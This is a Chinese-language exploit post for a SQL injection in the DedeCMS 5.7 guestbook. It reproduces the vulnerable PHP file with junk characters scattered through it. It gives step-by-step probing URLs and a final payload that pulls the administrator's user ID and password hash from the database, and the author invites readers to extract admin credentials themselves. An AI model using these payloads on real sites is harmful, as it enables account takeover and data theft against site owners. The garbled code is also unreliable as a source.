dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

漏洞文件edit.inc.php具体代码：

< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  

   

0 c. K' ?, r+ D: Eif(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  
) b" ~' T; f# J! V4 m
% r& O: [' F# i; m2 \else $GUEST_BOOK_POS = "guestbook.php";  
; w# ]  _6 I3 W1 @7 h$ r, @
   

$id = intval($id);  

' Z2 B" Q* [1 Aif(empty($job)) $job='view';  

   
/ W9 H9 S: K, x# n8 b2 P
if($job=='del' && $g_isadmin)  
/ a6 I' h# B7 y, H
: @8 |+ v7 u* \, E0 h{  
' j6 B9 r1 C6 ^
( b- t( P0 j# |, h# {# {' W: C: O$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  
  J5 w) C. r1 A/ f; K: K
exit();  

6 x6 _$ N* T/ z! L' i}  
" }5 ]' s0 Y% I2 \7 X
else if($job=='check' && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

+ Q" j- z) t* H  W8 h$ ?exit();  
3 S# D3 r5 q( Q0 ]' @; U
9 E7 y. \3 q, z( K. @}  
! |7 y" K' e  \( a" |1 S
else if($job=='editok')  
0 s+ T, C6 A9 M: m
{  
( Q1 q0 u' R0 H  i8 R# F6 p, E
* A* W' `) x3 I5 R4 j' N; g# ~$remsg = trim($remsg);  

5 r9 e* z' ?& m8 S* G8 B% bif($remsg!='')  
5 g& x) I. O- \* A, M
# p5 P/ p9 d# F4 x# S) Y, C' X{  
0 H, Q, |) V4 C8 M4 M
//管理员回复不过滤HTML By:Errorera blog:errs.cc  

if($g_isadmin)  
; v5 P# \; ?. p
) p* b# x) p% D2 N# R" N; C9 i{  
. R$ m" B# j8 t$ L. r6 P' r/ H  V) {
$ w1 f% q4 s9 \3 R& f0 K" S$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  

) h8 E- b& O  V# X//$remsg <br /><font color=red>管理员回复：</font> }  

! ]. p) Y. S+ S8 M! r  k0 _# ]. felse

{  
! n/ T$ k9 P; [( w  N
$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  

- N/ C; c7 P( e. b- h$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  
: I3 s8 `. m6 O) J, `  W, t' N6 p5 N
) p& I9 |6 S$ `9 b9 ~$msg = $oldmsg.$remsg;  

! O, X8 L8 w' H. e$ P}  
, j2 j1 u* b( c1 `* g, M
}  

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  
, ]: P: U/ r( W/ a
; H5 q0 k9 ]" ~' d0 k$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  

ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  

. g' |! o3 L) k# b! u6 W, Sexit();  

+ E" r, |) d7 i}  

//home:www.errs.cc  
9 K" h5 U( U) ~6 E" B9 v4 E
if($g_isadmin)  
5 `8 y2 Y: w" n. M
. \) D# ?2 |: r+ H. h) V( g# z{  

5 _, M) y$ L* ~( {- l, h+ R9 c! n$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  
% v% u. z$ F3 W
require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  
% L9 |8 ^# o9 \! r8 Z) T2 D$ a
}  

else
& a- Y, p& e1 V4 R: K$ J  T
7 @, v3 w; L9 k! b{  

1 R) g  z* m: K& N5 r: [$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

) a& g6 q, N( N  k9 _require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

} 漏洞成功需要条件：
1. php magic_quotes_gpc=off
3 ~: R2 x. i6 s6 S! X1 O9 J' [! N/ [" M2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
4 Z! D7 P/ z) x; h* ~& X
$ d( c& W+ f, s5 P9 b; k怎么判断是否存在漏洞：
4 m# L' \9 s0 Z. ~3 O! S5 W先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
) I; k! y1 u- \' G然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问：

www.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证


5 }, o' z: k- t% b: [& t, C/ b明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
, [* p* O  L. m2 C/ Q6 {# n# V% y8 N4 ]如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问
( @5 B* w: L$ X! S1 j+ d
www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().
5 R  d' Y+ J' Z7 i
& h1 A* t3 l. ^. d  S8 \! Z大概利用就是这样，大家有兴趣的多研究下！！

最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='